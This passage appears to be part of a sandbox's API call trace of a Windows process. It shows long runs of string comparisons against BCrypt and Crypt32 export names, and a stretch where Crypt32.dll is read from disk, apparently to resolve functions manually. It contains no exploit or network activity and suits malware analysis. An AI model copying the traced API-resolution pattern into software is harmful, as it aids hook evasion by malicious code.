(lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0232.060] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0232.061] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0232.062] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0232.062] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.062] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.062] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0232.062] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0232.062] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0232.062] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0232.062] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0232.064] GetProcessHeap () returned 0x480000 [0232.064] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d42010 | out: hHeap=0x480000) returned 1 [0232.064] GetProcessHeap () returned 0x480000 [0232.064] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499980 [0232.064] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0232.441] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0232.441] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0232.442] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0232.442] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0232.442] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0232.442] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0232.443] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0232.443] GetProcessHeap () returned 0x480000 [0232.443] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1c30e0) returned 0x410a040 [0232.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0232.449] ReadFile (in: hFile=0x160, lpBuffer=0x410a040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x410a040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0232.731] CloseHandle (hObject=0x160) returned 1 [0232.732] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0232.732] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0232.732] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0232.732] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0232.733] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0232.733] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0232.733] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0232.733] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0232.733] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0232.733] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0232.733] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0232.733] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0232.733] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0232.733] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0232.733] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0232.733] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0232.733] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0232.734] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.734] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.735] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0232.736] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.737] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0232.737] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.737] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.738] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0232.738] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0232.739] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0232.739] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0232.739] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0232.740] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0232.741] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0232.742] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0232.742] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0232.742] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0232.743] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0232.743] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 